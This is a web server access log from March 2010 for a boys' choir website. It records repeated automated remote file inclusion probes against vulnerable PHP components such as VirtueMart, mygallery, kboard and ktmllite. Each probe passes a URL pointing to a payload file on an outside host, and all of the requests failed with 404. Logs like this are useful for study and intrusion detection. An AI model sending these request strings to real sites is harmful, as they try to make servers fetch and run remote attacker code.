213.175.197.86 - - [09/Mar/2010:09:31:08 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.143.29.250 - - [09/Mar/2010:09:32:01 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.143.29.250 - - [09/Mar/2010:09:32:02 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:09:32:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:09:32:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:09:32:02 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.143.29.250 - - [09/Mar/2010:09:32:02 -0800] "GET /logs/access_100101.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:09:32:07 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:32:15 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.143.29.250 - - [09/Mar/2010:09:32:39 -0800] "GET /logs/access_091229.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:33:29 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:33:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:33:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:33:32 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.144.106 - - [09/Mar/2010:09:33:46 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.144.106 - - [09/Mar/2010:09:33:47 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.144.106 - - [09/Mar/2010:09:33:47 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:33:52 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
111.67.195.234 - - [09/Mar/2010:09:33:54 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:09:34:25 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:36:41 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:36:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:36:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:37:00 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:37:09 -0800] "GET /logs/access_100109.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:37:09 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:37:12 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:37:24 -0800] "GET /logs/access_100205.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:37:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:37:56 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:37:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:38:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:38:10 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:38:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:38:29 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:38:51 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.241.177.123 - - [09/Mar/2010:09:38:52 -0800] "GET /index.php?redir=http://alandar.net/www2/lang?????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:39:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:39:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:39:08 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:39:33 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:39:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:39:47 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:39:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:39:48 -0800] "GET /logs//components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:39:48 -0800] "GET /components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:09:40:03 -0800] "GET /logs/access_100101.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:09:40:03 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:09:40:03 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:03 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:40:03 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:08 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:40:14 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:20 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:09:40:24 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.55.227.145 - - [09/Mar/2010:09:40:30 -0800] "GET /logs/access_091229.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:40:36 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:40:38 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:40:38 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:40:38 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:40:38 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:09:40:39 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:40:41 -0800] "GET /logs/access_100212.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:41:03 -0800] "GET /logs/access_100213.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.144.106 - - [09/Mar/2010:09:41:10 -0800] "GET /logs/access_091229.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.byz9991.jatimcrew.com/bot/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:09:41:57 -0800] "GET /errors.php?error=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:09:41:57 -0800] "GET /logs/errors.php?error=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:09:41:57 -0800] "GET /logs/access.log/errors.php?error=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:25 -0800] "GET /logs/access_100109.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:25 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:26 -0800] "GET /logs/access_100109.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:27 -0800] "GET /admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:30 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:30 -0800] "GET /logs//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:42 -0800] "GET /logs/access_100205.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.180.124.146 - - [09/Mar/2010:09:42:45 -0800] "GET /logs/access_100205.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.143.29.250 - - [09/Mar/2010:09:43:16 -0800] "GET /logs/access_091229.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:43:48 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:43:48 -0800] "GET /logs/access_100213.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:43:48 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:43:49 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:43:49 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:43:49 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:09:45:03 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
123.143.29.250 - - [09/Mar/2010:09:45:25 -0800] "GET /logs/access_100126.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tccca.org.tw/appserv/de/de/img/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.93.10.36 - - [09/Mar/2010:09:46:07 -0800] "GET /nullpo/hsList.php?subdir=http://zztotti.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.93.10.36 - - [09/Mar/2010:09:46:07 -0800] "GET /logs//nullpo/hsList.php?subdir=http://zztotti.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.93.10.36 - - [09/Mar/2010:09:46:07 -0800] "GET /logs/access_100202.log%20%20//nullpo/hsList.php?subdir=http://zztotti.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
188.93.10.36 - - [09/Mar/2010:09:46:10 -0800] "GET /logs/access_100202.log//nullpo/hsList.php?subdir=http://zvv6.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.americanboyschoir.com"
188.93.10.36 - - [09/Mar/2010:09:46:10 -0800] "GET /nullpo/hsList.php?subdir=http://zvv6.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.americanboyschoir.com"
188.93.10.36 - - [09/Mar/2010:09:46:10 -0800] "GET /logs//nullpo/hsList.php?subdir=http://zvv6.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:46:21 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:46:21 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:46:21 -0800] "GET /logs/access_100101.log%20%20///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:23 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:23 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:23 -0800] "GET /logs/access_100213.log%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:32 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:32 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:32 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:46:34 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:34 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:34 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:09:46:34 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:46:50 -0800] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:46:50 -0800] "GET /logs///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:46:50 -0800] "GET /logs/access_100101.log///kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
